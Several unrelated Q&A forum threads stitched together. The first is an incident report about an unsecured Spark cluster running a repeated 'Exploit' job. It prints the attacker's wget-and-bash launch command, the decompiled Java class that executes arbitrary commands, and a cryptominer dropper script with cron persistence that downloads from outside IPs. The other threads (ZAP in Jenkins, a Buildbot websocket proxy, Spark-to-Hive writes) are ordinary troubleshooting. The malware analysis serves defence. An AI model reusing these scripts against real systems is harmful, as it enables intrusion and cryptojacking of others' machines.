After a lot of searching and research, I am turning here for help.
The problem is that once a Spark cluster is built (one master and 4 workers, each with a different IP address), each executor constantly submits a "driver". In the web UI, I can see a class named "Exploit" submitted with each driver.
Below are the head and tail of one worker's log file.
Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker#129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384
18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo)
18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128
18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034
18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034.
18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker#129.10.58.202:44717
18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717
18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4
18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector#350d33b5
18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps...
18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps)
18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker#129.10.58.202:44717
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8
I found that there is "Exploit" code that attacks Spark clusters by taking advantage of the fact that anyone can submit applications to an unsecured Spark cluster:
ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER
But I don't think my cluster has been hacked, because the problem still exists after switching to authorized mode.
Has anyone else had this problem? And why would it happen?
THIS IS VERY ALARMING!
First, the decompiled source code shows that the driver executes whatever commands are supplied to it as arguments. In your case, it uses wget to download a script to /var/tmp and then executes it.
The downloaded script in turn downloads a "jpg" and pipes it to bash. THIS IS NOT AN IMAGE.
wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh
logo10.jpg is a shell script that installs a cron job and downloads even more code to run on your cluster. You are probably seeing this job being submitted repeatedly because it sets up a scheduled job.
#!/bin/sh
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w sustes |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.248:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
Decompiled Source
public class Exploit {
public Exploit() {
}
public static void main(String[] var0) throws Exception {
String[] var1 = var0[0].split(",");
String[] var2 = var1;
int var3 = var1.length;
for(int var4 = 0; var4 < var3; ++var4) {
String var5 = var2[var4];
System.out.println(var5);
System.out.println(executeCommand(var5.trim()));
System.out.println("==============================================");
}
}
private static String executeCommand(String var0) {
StringBuilder var1 = new StringBuilder();
try {
Process var2 = Runtime.getRuntime().exec(var0);
var2.waitFor();
BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream()));
String var4;
while((var4 = var3.readLine()) != null) {
var1.append(var4).append("\n");
}
} catch (Exception var5) {
var5.printStackTrace();
}
return var1.toString();
}
}
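To make the argument handling in main concrete, here is a minimal Python sketch of the same comma-splitting, applied to the argument string from the Launch Command in the question. It only returns and prints the pieces and deliberately executes nothing. The function name split_driver_argument is made up for illustration.

```python
def split_driver_argument(arg):
    """Mirror var0[0].split(",") plus trim() from the decompiled main().

    Illustration only: the resulting strings are returned, never executed.
    """
    return [part.strip() for part in arg.split(",")]


# Argument string copied from the Launch Command in the worker log.
payload = ("wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,"
           "bash /var/tmp/a.sh")

commands = split_driver_argument(payload)
for command in commands:
    print(command)
```

So the single argument expands to two commands run in order: the download, then the execution of the downloaded script.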
I have created a pipeline that uses OWASP ZAP:
pipeline {
agent any
stages {
stage('Execute Zap Jar') {
steps {
sh '''
java -jar /home/pl/tools/com.cloudbees.jenkins.plugins.customtools.CustomTool/OwaspZap/ZAP_2.12.0/zap-2.12.0.jar -dir "/home/pl/.ZAP" -host 0.0.0.0 -port 8090 -daemon -config api.disablekey=true
'''
}
}
stage('Execute Zap CLI') {
steps {
sh '''
export ZAP_URL=http://localhost && export ZAP_PORT=8090 && zap-cli status
'''
}
}
stage('Execute Zap Session and Zap Scan') {
steps {
sh '''
zap-cli session new && zap-cli spider https://portail-re7-test.XXXXXX.com/ && zap-cli ajax-spider https://portail-re7-test.XXXXXX.com/ && zap-cli active-scan https://portail-re7-test.XXXXXX.com/ && zap session save default
'''
}
}
stage('Extract Zap Report') {
steps {
sh '''
zap-cli report -o report-default.html -f html
'''
}
}
}
}
But it is getting stuck at
7127 [ZAP-daemon] INFO org.zaproxy.addon.network.ExtensionNetwork - ZAP is now listening on 0.0.0.0:8090
Can someone please help me understand what I am doing wrong?
Regards,
SAM
It looks like ZAP is behaving as expected: it has been started and is listening on port 8090.
It was started in daemon mode, so it will keep running until you stop it. That means the first sh step never returns, and the later stages are never reached.
FYI this is not one of the recommended ways to run ZAP - these are listed on https://www.zaproxy.org/docs/automate/
I'd recommend using the Automation Framework :)
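If you do keep the current approach and start the daemon in the background instead (which is not one of the recommended ways linked above), a later step still has to wait until ZAP is actually listening before it calls zap-cli. A minimal Python sketch of such a wait follows. wait_for_port is a hypothetical helper, not part of ZAP or zap-cli, and the host and port in the usage comment are simply the ones from the question.

```python
import socket
import time


def wait_for_port(host, port, timeout=120.0, interval=1.0):
    """Return True once host:port accepts a TCP connection, False on timeout."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            # A successful connect means something is listening on the port.
            with socket.create_connection((host, port), timeout=interval):
                return True
        except OSError:
            # Not listening yet (or unreachable); retry until the deadline.
            time.sleep(interval)
    return False


# Usage, with the values from the pipeline in the question:
#   wait_for_port("localhost", 8090)
```

This only tells you the port is open. It does not tell you that ZAP has finished loading its add-ons, so a status check afterwards is still worthwhile.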
I have installed buildbot -- one docker image with a master, and another with a worker. Inter-container networking is allowed, and they share the same network; I also have a gitea instance, and installed the buildbot_gitea plugin.
So far I have a small project that runs make on the worker after a push, and buildbot correctly reports success back to gitea (I can tell from the logs, and gitea also shows the green check mark on the repo).
However,
the waterfall view is always empty; the console and grid views do not load (they show the "loading" animation and never finish);
in the "Home" buildbot tab, the list of recent builds sometimes shows up and sometimes doesn't (but the number of recent builds is always correct);
if I click on one of the builds (successful or not, it doesn't matter), it shows a build page, but an empty one (no build steps, no build properties, nothing).
The only things that look strange in the master logs are periodic timeout messages and some connection-drop messages:
2020-03-21 12:11:26+0000 [-] Timing out client: IPv4Address(type='TCP', host='172.27.0.1', port=56388)
2020-03-21 12:11:26+0000 [-] Timing out client: IPv4Address(type='TCP', host='172.27.0.1', port=56380)
2020-03-21 12:11:26+0000 [-] Timing out client: IPv4Address(type='TCP', host='172.27.0.1', port=56392)
2020-03-21 12:19:40+0000 [-] dropping connection to peer tcp4:172.27.0.1:56598 with abort=False: None
and this:
2020-03-21 12:10:49+0000 [-] Unhandled error in Deferred:
2020-03-21 12:10:49+0000 [-] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
self.run()
File "/usr/lib/python3.8/threading.py", line 870, in run
self._target(*self._args, **self._kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/_threads/_threadworker.py", line 46, in work
task()
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/_threads/_team.py", line 190, in doWork
task()
--- <exception caught here> ---
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/python/threadpool.py", line 250, in inContext
result = inContext.theWork()
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/python/threadpool.py", line 266, in <lambda>
inContext.theWork = lambda: context.call(ctx, func, *args, **kw)
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/python/context.py", line 122, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/bbot/sandbox/lib/python3.8/site-packages/twisted/python/context.py", line 85, in callWithContext
return func(*args,**kw)
File "/bbot/sandbox/lib/python3.8/site-packages/buildbot/buildbot_net_usage_data.py", line 204, in _sendBuildbotNetUsageData
res = _sendWithRequests(PHONE_HOME_URL, data)
File "/bbot/sandbox/lib/python3.8/site-packages/buildbot/buildbot_net_usage_data.py", line 197, in _sendWithRequests
r = requests.post(url, json=data)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/api.py", line 119, in post
return request('post', url, data=data, json=json, **kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/sessions.py", line 530, in request
resp = self.send(prep, **send_kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/sessions.py", line 643, in send
r = adapter.send(request, **kwargs)
File "/bbot/sandbox/lib/python3.8/site-packages/requests/adapters.py", line 516, in send
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='events.buildbot.net', port=443): Max retries exceeded with url: /events/phone_home (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7ff7297704f0>: Failed to establish a new connection: [Errno 110] Operation timed out'))
which seems to happen only once. (Why is buildbot trying to phone home anyway? There is no mention of events.buildbot.net in any of my config files.)
The docker containers have full network access, ipv6, routing and DNS are all fine (tested with the buildbot-master image).
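A side note on the phone-home question: as far as I know, this is Buildbot's usage-statistics report, which is on by default and is controlled by the buildbotNetUsageData setting in master.cfg rather than by anything configured explicitly. A minimal sketch of switching it off follows. The dict here only stands in for the real BuildmasterConfig.

```python
# Stand-in for the BuildmasterConfig dict defined in master.cfg.
c = BuildmasterConfig = {}

# None disables the usage report sent to events.buildbot.net;
# the other documented values are 'basic' (the default) and 'full'.
c['buildbotNetUsageData'] = None
```

The failed report is unrelated to the empty views. It only shows that the container could not reach events.buildbot.net at that moment.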
This is my master.cfg:
import os
from twisted.application import service
from buildbot.master import BuildMaster
from buildbot.plugins import *
from buildbot_gitea.auth import GiteaAuth
from buildbot_gitea import *
basedir = '/bbot/bbot-master'
rotateLength = 10000000
maxRotatedFiles = 10
configfile = 'master.cfg'
umask = None
if basedir == '.':
    basedir = os.path.abspath(os.path.dirname(__file__))
application = service.Application('buildmaster')
from twisted.python.logfile import LogFile
from twisted.python.log import ILogObserver, FileLogObserver
logfile = LogFile.fromFullPath(os.path.join(basedir, "twistd.log"), rotateLength=rotateLength,
maxRotatedFiles=maxRotatedFiles)
application.setComponent(ILogObserver, FileLogObserver(logfile).emit)
m = BuildMaster(basedir, configfile, umask)
m.setServiceParent(application)
m.log_rotation.rotateLength = rotateLength
m.log_rotation.maxRotatedFiles = maxRotatedFiles
# -*- python -*-
# ex: set filetype=python:
from buildbot.plugins import *
c = BuildmasterConfig = {}
####### WORKERS
c['workers'] = [worker.Worker("bbot-worker", "BUILDBOT_PASSWORD")]
c['protocols'] = {'pb': {'port': 9989}}
####### CHANGESOURCES
c['change_source'] = []
c['change_source'].append(changes.PBChangeSource())
####### SCHEDULERS
c['schedulers'] = []
c['schedulers'].append(schedulers.SingleBranchScheduler(
name="all",
change_filter=util.ChangeFilter(branch='master'),
treeStableTimer=None,
builderNames=["runtests"]))
c['schedulers'].append(schedulers.ForceScheduler(
name="force",
builderNames=["runtests"]))
####### BUILDERS
factory = util.BuildFactory()
factory.addStep(steps.Gitea(repourl='gitea@gitea.mydomain:myself/repo.git',
mode='incremental',
workdir="build",
branch="master",
progress=True,
logEnviron=False,
))
factory.addStep(steps.ShellCommand(command=["make"]))
c['builders'] = []
c['builders'].append(
util.BuilderConfig(name="runtests",
workernames=["bbot-worker"],
factory=factory))
####### BUILDBOT SERVICES
c['services'] = [
reporters.GiteaStatusPush(
baseURL="https://gitea.mydomain/",
token="GITEA_API_ACCESS_TOKEN",
verbose=True)
]
####### PROJECT IDENTITY
c['title'] = "My Domain!"
c['titleURL'] = "https://buildbot.mydomain"
c['buildbotURL'] = "https://buildbot.mydomain/"
c['www'] = dict(port=8010,
plugins=dict(waterfall_view={}, console_view={}, grid_view={}))
c['www']['authz'] = util.Authz(
allowRules = [
util.AnyEndpointMatcher(role="admins")
],
roleMatchers = [
util.RolesFromUsername(roles=['admins'], usernames=['myself'])
]
)
c['www']['auth'] = GiteaAuth(
endpoint="https://gitea.mydomain/",
client_id="MY_CLIENT_ID_FROM_GITEA",
client_secret='MY_CLIENT_SECRET_FROM_GITEA')
c['www']['change_hook_dialects'] = {
'gitea': {
'secret': 'THE_GITEA_WEBHOOK_SECRET',
'onlyIncludePushCommit': True
}
}
####### DB URL
c['db'] = {
'db_url' : "postgresql://buildbot:MY_SECRET_DB_PASSWORD@172.25.0.2/buildbot",
}
The Dockerfile for the master is
FROM alpine:3.11.3
EXPOSE 9989
RUN apk update
RUN apk add python3 bash busybox-extras w3m gcc python3-dev libffi-dev openssl-dev musl-dev postgresql-dev
RUN mkdir /bbot
COPY entrypoint.sh /root/
RUN chmod a+x /root/entrypoint.sh
RUN mkdir /root/.ssh && chmod og-rwx /root/.ssh/
COPY bbot-gitea bbot-gitea.pub /root/.ssh/
RUN chmod og-w /root/.ssh/bbot-gitea*
RUN cd /bbot && \
python3 -m venv sandbox && \
source sandbox/bin/activate && \
pip3 install 'buildbot[bundle]' && \
pip3 install 'requests[security]' && \
pip3 -v install buildbot_gitea && \
pip3 install treq && \
pip3 install psycopg2
RUN apk del gcc python3-dev libffi-dev openssl-dev musl-dev
RUN ls -la /root
RUN cat /root/entrypoint.sh
ENTRYPOINT [ "/root/entrypoint.sh" ]
and the entrypoint does nothing special -- it is this,
#!/bin/bash
cd /bbot
echo " BBOT MASTER ENTRYPOINT"
source sandbox/bin/activate
buildbot upgrade-master bbot-master
# debug: check everything that was pip-installed:
echo "\n\n=====\n"
pip3 list
echo "=====\n\n"
if [ ! -f bbot-master/buildbot.tac ]; then
buildbot create-master bbot-master
fi
buildbot start bbot-master
tail -f /bbot/bbot-master/twistd.log
and the pip3 list line, which runs on startup for debugging, shows that I have
buildbot 2.7.0
buildbot-console-view 2.7.0
buildbot-gitea 1.2.0
buildbot-grid-view 2.7.0
buildbot-waterfall-view 2.7.0
buildbot-worker 2.7.0
buildbot-www 2.7.0
edit: checked the JS console in Firefox, and there seems to be a problem connecting to the server via websockets:
Firefox can’t establish a connection to the server at wss://buildbot.mydomain/ws.
From Chrome, this is what I see:
WebSocket connection to 'wss://buildbot.aleph0.info/ws' failed: Error during WebSocket handshake: Unexpected response code: 200
(200? why 200?)
I can't see why it wouldn't work. Apache is configured to do reverse proxying, like this:
RewriteEngine On
RewriteCond ${HTTP:Upgrade} websocket [NC]
RewriteCond ${HTTP:Connection} upgrade [NC]
RewriteRule .* "wss:/localhost:8010/$1" [P,L]
ProxyPass / http://localhost:8010/
ProxyPassReverse / http://localhost:8010/
So... What else can I do to continue debugging this?
(By the way, it looks like the buildbot mailing list is not very active -- after posting this question there I checked the archives, and there is very little activity. Where do Buildbot users go these days to get and share advice?)
I found the problem!
It was the reverse proxy that wasn't properly configured for websockets.
I used this in my apache virtualhost config,
<Location /ws>
ProxyPass ws://127.0.0.1:8010/ws
ProxyPassReverse ws://127.0.0.1:8010/ws
</Location>
ProxyPass /ws !
ProxyPass / http://localhost:8010/
ProxyPassReverse / http://localhost:8010/
and it works now!
(After a lot of searching, I found the solution here:
https://docs.buildbot.net/0.9.2/manual/cfg-www.html)
There it is, in case anyone else needs it.
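For anyone debugging the same symptom: a WebSocket handshake succeeds only when the server answers 101 Switching Protocols with a Sec-WebSocket-Accept header derived from the client's key (RFC 6455). A 200 usually means the request reached the backend as an ordinary HTTP GET, that is, the proxy did not pass the upgrade through. The Python sketch below shows that check. The function names are made up for illustration, and nothing in it is Buildbot-specific.

```python
import base64
import hashlib

# Fixed GUID defined by RFC 6455 for computing Sec-WebSocket-Accept.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


def expected_accept(sec_websocket_key):
    """Compute the Sec-WebSocket-Accept value a server must send back."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def describe_handshake(status, accept_header, sec_websocket_key):
    """Classify a handshake response by status code and accept header."""
    if status == 101 and accept_header == expected_accept(sec_websocket_key):
        return "upgraded"
    if status == 200:
        return "plain HTTP response: the Upgrade was not proxied"
    return "handshake failed"


# Sample key and accept value from the RFC 6455 handshake example.
key = "dGhlIHNhbXBsZSBub25jZQ=="
print(describe_handshake(101, "s3pPLMBiTxaQ9kYGzzhZRbK+xOo=", key))
print(describe_handshake(200, None, key))
```

With the original rewrite rules the browser was in the second case, which matches the "Unexpected response code: 200" message from Chrome.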
As a data source I am using a Kafka stream to consume tweets.
I have written a simple Spark Streaming application.
I am able to consume the tweets and to convert the records to my own case class.
But I am not able to write to a Hive table located in the same Docker environment as Spark.
Can you give me a hint on how to solve this?
import com.fhjoanneum.swd18.grp3.bigdata.convert.TweetToTwitterDbRecord
import com.fhjoanneum.swd18.grp3.bigdata.domain.Tweet
import com.typesafe.scalalogging.LazyLogging
import org.apache.spark.sql._
import org.json4s.jackson.JsonMethods.parse
import org.json4s.{DefaultFormats}
case object TwitterInputStream extends App with LazyLogging {
val spark = SparkSession
.builder()
.appName(s"TestApp")
.master("local[*]")
.config("hive.metastore.uris", "thrift://0.0.0.0:9083")
.enableHiveSupport()
.getOrCreate()
spark.sql("set hive.exec.dynamic.partition.mode=nonstrict")
spark.sql("SET hive.exec.parallel=true")
spark.sql("SET hive.exec.parallel.thread.number=16")
val df = spark.readStream
.format("kafka")
.option("kafka.bootstrap.servers", "192.168.1.156:9092")
.option("subscribe", "twitter-status")
.option("startingOffsets", "latest") // From starting
.load()
import spark.implicits._
val testerDF = df.selectExpr("CAST(value AS STRING)").as[String]
val parsedMsgs = testerDF.map(value => {
implicit val formats = DefaultFormats
val tweet = parse(value).extract[Tweet]
tweet
})
// the following part causes my problems:
val query = parsedMsgs.map(TweetToTwitterDbRecord)
.writeStream.foreachBatch((batchDs: Dataset[_], batchId: Long) =>
batchDs.write
.format("parquet")
.mode(SaveMode.Append)
.insertInto("grp3.tweets")
).start().awaitTermination()
// the commented part works:
// parsedMsgs.writeStream
// .format("console")
// .outputMode("append")
// .start()
// .awaitTermination()
}
The table I want to write to was created with this statement:
CREATE EXTERNAL TABLE `tweets`(
`id` BigInt,
`createdAt` String,
`text` String,
`userId` Int,
`geo` String,
`coordinates` String,
`place` String,
`quoteCount` Int,
`replyCount` Int,
`retweetCount` Int,
`favoriteCount` Int,
`timestampMs` BigInt
)
ROW FORMAT DELIMITED FIELDS TERMINATED BY ','
STORED AS PARQUET LOCATION '/data/bigdata/tweets'
TBLPROPERTIES ("parquet.compression"="SNAPPY");
It does not fail outright; I have to switch my logger to DEBUG to see what's going on.
The following are the last lines of my logger output:
2020-01-28 21:38:53 INFO ParquetWriteSupport:54 - Initialized Parquet WriteSupport with Catalyst schema:
{
"type" : "struct",
"fields" : [ {
"name" : "id",
"type" : "long",
"nullable" : true,
"metadata" : { }
}, {
"name" : "createdat",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "text",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "userid",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "geo",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "coordinates",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "place",
"type" : "string",
"nullable" : true,
"metadata" : { }
}, {
"name" : "quotecount",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "replycount",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "retweetcount",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "favoritecount",
"type" : "integer",
"nullable" : false,
"metadata" : { }
}, {
"name" : "timestampms",
"type" : "long",
"nullable" : true,
"metadata" : { }
} ]
}
and corresponding Parquet message type:
message spark_schema {
optional int64 id;
optional binary createdat (UTF8);
optional binary text (UTF8);
required int32 userid;
optional binary geo (UTF8);
optional binary coordinates (UTF8);
optional binary place (UTF8);
required int32 quotecount;
required int32 replycount;
required int32 retweetcount;
required int32 favoritecount;
optional int64 timestampms;
}
2020-01-28 21:38:53 DEBUG DFSClient:1646 - /data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128213853_0001_m_000000_1/part-00000-72cb3fde-ecbe-4969-aac5-becbd65a147d-c000.snappy.parquet: masked=rw-r--r--
2020-01-28 21:38:53 DEBUG Client:1026 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas sending #7
2020-01-28 21:38:53 DEBUG Client:1083 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas got value #7
2020-01-28 21:38:53 DEBUG ProtobufRpcEngine:253 - Call: create took 4ms
2020-01-28 21:38:53 DEBUG DFSClient:1802 - computePacketChunkSize: src=/data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128213853_0001_m_000000_1/part-00000-72cb3fde-ecbe-4969-aac5-becbd65a147d-c000.snappy.parquet, chunkSize=516, chunksPerPacket=127, packetSize=65532
2020-01-28 21:38:53 DEBUG LeaseRenewer:301 - Lease renewer daemon for [DFSClient_NONMAPREDUCE_469557971_72] with renew id 1 started
2020-01-28 21:38:53 DEBUG ParquetFileWriter:281 - 0: start
2020-01-28 21:38:53 DEBUG MemoryManager:63 - Allocated total memory pool is: 3626971910
2020-01-28 21:38:53 INFO CodecPool:151 - Got brand-new compressor [.snappy]
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64
2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024
2020-01-28 21:38:53 DEBUG MemoryManager:138 - Adjust block size from 134,217,728 to 134,217,728 for writer: org.apache.parquet.hadoop.InternalParquetRecordWriter#61628754
2020-01-28 21:38:53 DEBUG RecordConsumerLoggingWrapper:69 - <!-- flush -->
2020-01-28 21:38:53 INFO InternalParquetRecordWriter:165 - Flushing mem columnStore to file. allocated memory: 0
2020-01-28 21:38:53 DEBUG ParquetFileWriter:682 - 4: end
2020-01-28 21:38:54 DEBUG ParquetFileWriter:692 - 1209: footer length = 1205
2020-01-28 21:38:54 DEBUG BytesUtils:159 - write le int: 1205 => 181 4 0 0
2020-01-28 21:38:54 DEBUG DFSClient:1869 - DFSClient writeChunk allocating new packet seqno=0, src=/data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128213853_0001_m_000000_1/part-00000-72cb3fde-ecbe-4969-aac5-becbd65a147d-c000.snappy.parquet, packetSize=65532, chunksPerPacket=127, bytesCurBlock=0
2020-01-28 21:38:54 DEBUG DFSClient:1815 - Queued packet 0
2020-01-28 21:38:54 DEBUG DFSClient:1815 - Queued packet 1
2020-01-28 21:38:54 DEBUG DFSClient:2133 - Waiting for ack for: 1
2020-01-28 21:38:54 DEBUG DFSClient:585 - Allocating new block
2020-01-28 21:38:54 DEBUG Client:1026 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas sending #8
2020-01-28 21:38:54 DEBUG Client:1083 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas got value #8
2020-01-28 21:38:54 DEBUG ProtobufRpcEngine:253 - Call: addBlock took 6ms
2020-01-28 21:38:54 DEBUG DFSClient:1390 - pipeline = 172.18.1.3:9866
2020-01-28 21:38:54 DEBUG DFSClient:1390 - pipeline = 172.18.1.2:9866
2020-01-28 21:38:54 DEBUG DFSClient:1601 - Connecting to datanode 172.18.1.3:9866
2020-01-28 21:38:54 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null)
2020-01-28 21:38:54 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response
2020-01-28 21:38:57 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null)
2020-01-28 21:38:57 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response
2020-01-28 21:39:00 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null)
2020-01-28 21:39:00 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response
